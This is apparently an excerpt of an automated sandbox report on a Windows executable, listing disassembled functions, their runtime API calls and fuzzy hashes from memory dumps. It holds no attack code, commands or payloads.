Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Function 25689130 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 256891A4

Memory Dump Source

Source File: 00000007.00000002.2129805657.0000000025680000.00000040.00000800.00020000.00000000.sdmp, Offset: 25680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_25680000_rpkhzpuO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a9b71ff10413bed3b54ca1decc8fdc11fa710264e1dbca5bc2c2560e3c729a8c
Instruction ID: e73a466bcd9447728e3e571373b3a68b6f60b2704067a08948c6a2844845c0c1
Opcode Fuzzy Hash: a9b71ff10413bed3b54ca1decc8fdc11fa710264e1dbca5bc2c2560e3c729a8c
Instruction Fuzzy Hash: 851108B1D042499FDB10DFAAC844AEEFBF5FF48320F10841AD519A7250C779A944CFA1

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Function 0040D534 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548

Function 0040EA0A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

_doexit.LIBCMT ref: 0040EA16

Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a0257ab8b89ab24c4dda27abc63ac43d0f25756bab2839dd78a8b277d7454467
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D2B0923298420833EA202643AC03F063B1987C0B64E244031BA0C2E1E1A9A2A9618189

Function 25689308 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CloseHandle.KERNELBASE ref: 2568936A

Memory Dump Source

Source File: 00000007.00000002.2129805657.0000000025680000.00000040.00000800.00020000.00000000.sdmp, Offset: 25680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_25680000_rpkhzpuO.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 648d9455893df3dddc1d94a4f67ed8aa0bec41db333da5b1275cdf28e653e974
Instruction ID: 6bdc8ad3e4fb5c0789fb2cf848892db4ee45fb37e117cbb0282bafa74f28bf2b
Opcode Fuzzy Hash: 648d9455893df3dddc1d94a4f67ed8aa0bec41db333da5b1275cdf28e653e974
Instruction Fuzzy Hash: A9113AB1D002488FCB10DFAAC8457EEFBF4EF88720F208419D51AA7240CB78A944CBA5

Function 2562D5F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b815015341f704da126aada94dce146748744be78ca3e3a9e05843d38e45732
Instruction ID: 4ac2418a9e42a3ecc8570debf5a2f4ebea83dfb977919fb77aaa042de525b6ad
Opcode Fuzzy Hash: 5b815015341f704da126aada94dce146748744be78ca3e3a9e05843d38e45732
Instruction Fuzzy Hash: B42103B1504644DFDB05DF14D9C0F16BFB6FB88310F20C56AE9088A256C33AE896CAA2

Function 2562D6DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31407185e024de6789f5f8b9b880fbb1de52c9ed10225ef284649a16fc43e2d3
Instruction ID: 9120cad7ce22fc31e11b0f9279b7981ca0001e26db45d9214922d9fc97cd96ae
Opcode Fuzzy Hash: 31407185e024de6789f5f8b9b880fbb1de52c9ed10225ef284649a16fc43e2d3
Instruction Fuzzy Hash: 8F210372504644DFCB05DF14D9C0F0ABFB6FB98314F20C56AE9088B256C33AE856CAE2

Function 2562D5EB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction ID: 698dd444362185bc2fb22aa77ca71cf54b7b089469f2b0b025ad2394d596315b
Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction Fuzzy Hash: D9119D76504680CFCB02CF10D5C4B06BF72FB88314F24C5AAD9494A656C336E55ACBA2

Function 2562D6D7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction ID: fe895d397ab1f1386039b597fae98abeab5713c03da38135d8e48cfb93c36ad6
Opcode Fuzzy Hash: 3fcf16f0ce3997a393d561b9291fa03094e96af132afbef0229708fa6f6a02d1
Instruction Fuzzy Hash: C611AF76504644CFCB02CF10D5C4B06BF72FB94314F24C6AAD9494B656C33AE55ADBA2

Function 2562D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3faa95300d04d70d3bcfbc87054ffdc8c46fd49337a1c335f12a473d749740a2
Instruction ID: 17a1edbb2d5ea56d41d5d5f73281e9912a25ec2836d4974ac995a65aba396c33
Opcode Fuzzy Hash: 3faa95300d04d70d3bcfbc87054ffdc8c46fd49337a1c335f12a473d749740a2
Instruction Fuzzy Hash: 4701407140D7809EE7128B259884752BFB8EF43224F18859BD984CF2A7C2695C45CB72

Function 2562D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2129449268.000000002562D000.00000040.00000800.00020000.00000000.sdmp, Offset: 2562D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2562d000_rpkhzpuO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31f48b0dd7acbc9b5a24bd3f193032b2a024d943ace43d01cf3c40b3c8d12948
Instruction ID: 744d3a5794b2ba0c4f4a5ec435b9c9e446cf8d438993034628acdda95165a9cd
Opcode Fuzzy Hash: 31f48b0dd7acbc9b5a24bd3f193032b2a024d943ace43d01cf3c40b3c8d12948
Instruction Fuzzy Hash: D401F771008B009AE3108E16C980F57BFA8EF45360F14C42BED488A2A6C279AC42CEB2

Non-executed Functions

Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 004136F4
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
TerminateProcess.KERNEL32(00000000), ref: 00413737

Memory Dump Source

Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D

Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0040ADD0
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1

Memory Dump Source

Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58

Function 004123F1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6

Memory Dump Source

Source File: 00000007.00000002.2099220238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2099220238.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2099220238.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569

Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,25731908), ref: 004170C5
MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
_malloc.LIBCMT ref: 0041718A
MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
_malloc.LIBCMT ref: 0041724C
LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
__freea.LIBCMT ref: 004172A4
__freea.LIBCMT ref: 004172AD
___ansicp.LIBCMT ref: 004172DE
___convertcp.LIBCMT ref: 00417309
LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
_malloc.LIBCMT ref: 00417362
_memset.LIBCMT ref: 00417384
LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
___convertcp.LIBCMT ref: 004173BA
__freea.LIBCMT ref: 004173CF
LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
String ID:
API String ID: 3809854901-0
Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98

Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 004057DE

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

_malloc.LIBCMT ref: 00405842
_malloc.LIBCMT ref: 00405906
_malloc.LIBCMT ref: 00405930

Strings

1.2.3, xrefs: 004058EC, 00405937

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _malloc$AllocateHeap
String ID: 1.2.3
API String ID: 680241177-2310465506
Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A

Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040BD24
_memcpy_s.LIBCMT ref: 0040BD99
__fileno.LIBCMT ref: 0040BDF9
__read.LIBCMT ref: 0040BE00
__filbuf.LIBCMT ref: 0040BE24
_memset.LIBCMT ref: 0040BE6A
_memset.LIBCMT ref: 0040BE95

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
String ID:
API String ID: 3886058894-0
Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD

Function 004017E0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON

Download Yara Rule

APIs

EntryPoint.RPKHZPUO(80070057), ref: 004017EE

Part of subcall function 00401030: RaiseException.KERNEL32(?,00000001,00000000,00000000,00000015,-30B19E70,2C2D8410), ref: 0040101C
Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030

EntryPoint.RPKHZPUO(80070057), ref: 00401800
EntryPoint.RPKHZPUO(80070057), ref: 00401813
__recalloc.LIBCMT ref: 00401828
EntryPoint.RPKHZPUO(8007000E), ref: 00401839
EntryPoint.RPKHZPUO(8007000E), ref: 00401853
_calloc.LIBCMT ref: 00401861

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
String ID:
API String ID: 1721462702-0
Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00414744

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__getptd.LIBCMT ref: 0041475B
__amsg_exit.LIBCMT ref: 00414769
__lock.LIBCMT ref: 00414779

Strings

@.B, xrefs: 00414786

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID: @.B
API String ID: 3521780317-470711618
Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(257316A8), ref: 00414050

Memory Dump Source

Source File: 00000007.00000001.2063317653.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000001.2063317653.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
Associated: 00000007.00000001.2063317653.000000000045A000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_1_400000_rpkhzpuO.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
